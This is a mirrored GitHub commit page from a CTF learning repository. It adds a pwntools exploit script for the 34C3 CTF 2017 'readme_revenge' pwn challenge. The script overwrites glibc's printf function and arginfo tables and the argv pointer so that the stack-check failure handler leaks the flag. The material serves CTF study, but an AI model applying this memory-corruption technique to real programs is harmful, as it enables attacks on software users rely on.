nganhkhoa/CTF-All-In-One
1
0
Fork 0
mirror of https://github.com/nganhkhoa/CTF-All-In-One.git synced 2025-06-24 04:05:03 +07:00
Code Issues Projects Releases Wiki Activity

finish 6.1.13

Browse Source
This commit is contained in:
firmianay
2018-04-09 01:12:57 +08:00
parent c728ae6d71
commit 578c6add6e
11 changed files with 314 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

26
src/writeup/6.1.13_pwn_34c3ctf2017_readme_revenge/exp.py Normal file
View File

@ -0,0 +1,26 @@
from pwn import *
io = process('./readme_revenge')
flag_addr = 0x6b4040
name_addr = 0x6b73e0
argv_addr = 0x6b7980
func_table = 0x6b7a28
arginfo_table = 0x6b7aa8
stack_chk_fail = 0x4359b0
payload = p64(flag_addr) # name
payload = payload.ljust(0x73 * 8, "\x00")
payload += p64(stack_chk_fail) # __printf_arginfo_table[spec->info.spec]
payload = payload.ljust(argv_addr - name_addr, "\x00")
payload += p64(name_addr) # argv
payload = payload.ljust(func_table - name_addr, "\x00")
payload += p64(name_addr) # __printf_function_table
payload = payload.ljust(arginfo_table - name_addr, "\x00")
payload += p64(name_addr) # __printf_arginfo_table
# with open("./payload", "wb") as f:
# f.write(payload)
io.sendline(payload)
io.interactive()

BIN
src/writeup/6.1.13_pwn_34c3ctf2017_readme_revenge/payload Normal file
View File

Binary file not shown.

BIN
src/writeup/6.1.14_pwn_32c3ctf2015_readme/readme.bin Executable file
View File

Binary file not shown.